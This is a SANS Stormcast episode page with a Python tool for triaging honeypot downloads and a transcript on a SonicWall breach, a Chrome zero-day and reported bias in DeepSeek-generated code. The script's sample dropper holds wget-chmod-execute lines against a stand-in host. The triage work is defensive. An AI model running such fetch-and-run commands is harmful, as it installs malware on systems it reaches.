SANS Stormcast Friday, September 19th, 2025: Honeypot File Analysis (@sans_edu); SonicWall Breach; DeepSeek Bias; Chrome 0-day

If you are not able to play the podcast using the player below: Use this direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9620.mp3

Exploring Uploads in a Dshield Honeypot Environment
This guest diary by one of our SANS.edu undergraduate interns shows how to analyze files uploaded to Cowrie
https://isc.sans.edu/diary/Exploring%20Uploads%20in%20a%20Dshield%20Honeypot%20Environment%20%5BGuest%20Diary%5D/32296
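The triage the diary (and the transcript below) describes, sorting a Cowrie download directory into per-architecture ELF payloads and the small shell droppers that fetch and run them, can be started with a script like this. It is an added example, not code from the guest diary or from the Cowrie project: the dropper text, the ELF header bytes and the TEST-NET URLs are constructed sample data, and the file-name tags it matches are assumptions about typical multi-architecture drops.

```python
"""Quick triage of a Cowrie-style download directory (added example, not Cowrie's code).

Assumes the directory holds raw downloaded files as Cowrie stores them. Constructed
sample data below stands in for real samples.
"""
import hashlib
import re
import struct
import sys
from pathlib import Path

# e_machine values from the ELF specification for architectures common in IoT bot drops
ELF_MACHINES = {0x03: "x86", 0x08: "MIPS", 0x14: "PowerPC", 0x28: "ARM",
                0x2A: "SuperH", 0x3E: "x86-64", 0xB7: "AArch64", 0xF3: "RISC-V"}

URL_RE = re.compile(r"""(?:https?|tftp|ftp)://[^\s'";|&<>]+""")
# architecture tags bot authors typically put in per-architecture payload file names (assumption)
ARCH_TAG_RE = re.compile(
    r"(x86_64|x86|i[3-6]86|mips64|mipsel|mips|aarch64|arm64|armv?[4-8]l?|arm|sh4|ppc|powerpc|m68k|sparc)",
    re.I)


def classify(data: bytes) -> dict:
    """Describe a sample by content: ELF (with target machine), shell script, or other."""
    if data[:4] == b"\x7fELF" and len(data) >= 20:
        ei_class, ei_data = data[4], data[5]            # 1/2 = 32/64-bit, 1/2 = LE/BE
        fmt = ("<" if ei_data == 1 else ">") + "H"
        e_machine = struct.unpack(fmt, data[18:20])[0]  # e_machine sits right after e_type at offset 16
        return {"type": "elf", "bits": 32 if ei_class == 1 else 64,
                "endian": "LE" if ei_data == 1 else "BE",
                "machine": ELF_MACHINES.get(e_machine, f"unknown(0x{e_machine:x})")}
    head = data[:4096]
    if head.startswith(b"#!") or any(tok in head for tok in (b"wget ", b"curl ", b"chmod ")):
        return {"type": "shell"}
    return {"type": "other"}


def analyze_dropper(text: str) -> dict:
    """Pull download URLs, architecture tags and an execute flag out of a dropper script."""
    urls = sorted(set(URL_RE.findall(text)))
    arches = sorted({m.lower() for u in urls for m in ARCH_TAG_RE.findall(u.rsplit("/", 1)[-1])})
    executes = bool(re.search(r"chmod\s+(\+x|[0-7]*7)", text)) and "./" in text
    return {"urls": urls, "architectures": arches, "executes_downloads": executes,
            "multi_arch_dropper": executes and len(arches) >= 2}


def triage_samples(samples: dict[str, bytes]) -> list[dict]:
    """One summary row per sample; shell scripts are additionally parsed as droppers."""
    rows = []
    for name, data in sorted(samples.items()):
        row = {"file": name, "sha256": hashlib.sha256(data).hexdigest(), **classify(data)}
        if row["type"] == "shell":
            row.update(analyze_dropper(data.decode("utf-8", "replace")))
        rows.append(row)
    return rows


def triage_directory(directory: Path) -> list[dict]:
    """Read every regular file in the download directory and triage it."""
    return triage_samples({p.name: p.read_bytes() for p in directory.iterdir() if p.is_file()})


# --- constructed sample input (not real malware; 192.0.2.0/24 is the TEST-NET range) ---
def make_elf_header(e_machine: int, bits: int = 32, little_endian: bool = True) -> bytes:
    """Build only the first 20 bytes of an ELF header, which is all classify() needs."""
    ident = b"\x7fELF" + bytes([1 if bits == 32 else 2, 1 if little_endian else 2, 1]) + b"\x00" * 9
    return ident + struct.pack(("<" if little_endian else ">") + "HH", 2, e_machine)


SAMPLE_DROPPER = b"""#!/bin/sh
cd /tmp || cd /var/run || cd /
wget http://192.0.2.10/bins/bot.mips; chmod +x bot.mips; ./bot.mips
wget http://192.0.2.10/bins/bot.mipsel; chmod +x bot.mipsel; ./bot.mipsel
wget http://192.0.2.10/bins/bot.arm7; chmod +x bot.arm7; ./bot.arm7
wget http://192.0.2.10/bins/bot.x86; chmod +x bot.x86; ./bot.x86
rm -rf bot.*
"""

SAMPLES = {
    "a1b2.sh": SAMPLE_DROPPER,
    "bot.mips": make_elf_header(0x08, little_endian=False),
    "bot.arm7": make_elf_header(0x28),
    "notes.txt": b"nothing to see here\n",
}

if __name__ == "__main__":
    # usage: python triage.py /path/to/cowrie/downloads   (falls back to the constructed samples)
    rows = triage_directory(Path(sys.argv[1])) if len(sys.argv) > 1 else triage_samples(SAMPLES)
    for row in rows:
        print(row)
```

The ELF check reads the header rather than trusting the file name, because the names in a download directory are whatever the bot chose; the dropper parser groups URLs by the architecture tag so a four-line script that fetches four payloads shows up as one multi-architecture pattern instead of four unrelated files.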

Sonicwall Breach
SonicWall “MySonicWall” accounts were breached via credential brute forcing
https://www.sonicwall.com/support/knowledge-base/mysonicwall-cloud-backup-file-incident/250915160910330

DeepSeek Bias
Cloudflare found significant biases in code created by the Chinese AI engine DeepSeek. Code for organizations not aligned with China’s politics contained significantly more bugs
https://www.washingtonpost.com/technology/2025/09/16/deepseek-ai-security/

Google Chrome 0-day
Google fixed an already-exploited vulnerability in Google Chrome
https://chromereleases.googleblog.com/2025/09/stable-channel-update-for-desktop_17.html

Podcast Transcript

Hello and welcome to the Friday, September 19th, 2025 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ullrich, recording today from Jacksonville, Florida. And this episode is brought to you by the SANS.edu graduate certificate program in penetration testing and ethical hacking.

In diaries today we have a post by one of our undergraduate interns, Nathan Smisson, who did look at the download directory in our Cowrie honeypot. That directory can be a little bit overwhelming for someone new to investigating honeypots, and it's really important to sort of find quick methods to triage what's there and quickly find patterns. One of the very common patterns is something that Nathan is looking at here, and that's where the bot has a small bash script that first downloads the actual bot, then for multiple architectures, and executes them, hoping that one of those will work on the architecture of the particular attacked victim's system. Overall, this is something that you'll see a lot in honeypots and definitely something to sort of be familiar with if you're trying to sort of work your way through a lot of these detects.

And in the past we had a lot of SonicWall news and suggestions that it may be zero-days, or that maybe firewalls were re-exploited after being exploited in the past and, well, credentials being leaked by the firewall. Turns out that there was another thing that, well, we didn't quite consider yet. And SonicWall published an advisory now that they found a good number, like five percent, of their customers had their MySonicWall account compromised. This was again a password brute force, so not a real vulnerability, I guess you could argue, within MySonicWall, other than maybe preventing brute forcing. I'm not sure what mitigations they had in place for that. But the result was that customers who had their MySonicWall credentials brute forced, well, had then their backup files exfiltrated. This is an optional feature in SonicWall, so you may have disabled that, but it's also sort of the preferred backup method for a number of their models. So what you have to do is you have to go to the MySonicWall account, check if you are backing up to MySonicWall. Also, SonicWall has published a list of affected serial numbers that you can verify. The actual firewall credentials were encrypted, as SonicWall states. Could be hashed; that's often really not that well differentiated in announcements like that. But if you have a relatively weak password you should of course consider that it will get brute forced then offline as an attacker gains access to these configurations. And of course these configurations may have unencrypted data in them that does make it easier for an attacker to target your particular device. There's also sort of an incident playbook that SonicWall published that you can follow. So if you are affected by this, again, minimum requirement is reset all passwords. If you happen to reuse these passwords on other devices, even if those serial numbers are not affected, you should also reset the passwords on those devices. So definitely make sure that you basically start from scratch with your SonicWall configuration and follow SonicWall's advice.

And the Washington Post today is reporting research by Cloudflare that DeepSeek apparently is writing less secure code if it's used to write code for purposes that are not aligned with China's main goal. So for example Falun Gong or Tibet related organizations should expect less secure code from DeepSeek. This is an interesting result, and the numbers they're reporting here in the Washington Post report are pretty telling; kind of, it's a pretty big difference. Of course a lot of questions here: there are no direct prompts or code snippets being shown here, so it's hard to compare that against other similar engines to see what code they would produce for these prompts. One suggestion being made is that this may not just be intentional but also something that's based on the more focused training data that excludes some of these causes, of course, from DeepSeek and from its knowledge base. So not quite sure what to make of it, and I think there's maybe more to this story than just sort of the headline here, but still something to consider, and definitely, you know, when you are using these models to code you must consider the provenance of the model and, well, what it's made for and who it is made by, because you do have a lot of trust in the code that's being created by these models.

And then we got a zero-day vulnerability in Google Chrome that was patched today. Before you go home for the weekend you probably want to make sure that you at least restart Chrome in order to apply any pending updates, but also take a moment and make sure that you are on the latest version after you restart it. This particular vulnerability has been reported being exploited. It's a type confusion vulnerability in Google Chrome's JavaScript engine V8, and, well, we had plenty of similar vulnerabilities before, so once details become known and the patches are diffed, it's likely that we'll see more exploitation of this particular flaw.

Well, this is it for today, so thanks again for listening, thanks for subscribing and liking this podcast. I will be at the SANS conference in Las Vegas next week, so say hi if you see me, and I'll always keep some stickers on me. And if you can't make it to Vegas, I will be in Denver and in Dallas for the remainder of the year, so one event in October and one in early December. You can always find future classes I'll be teaching in the show notes at the same page there. So that's it for today, thanks, and talk to you again on Monday. Bye.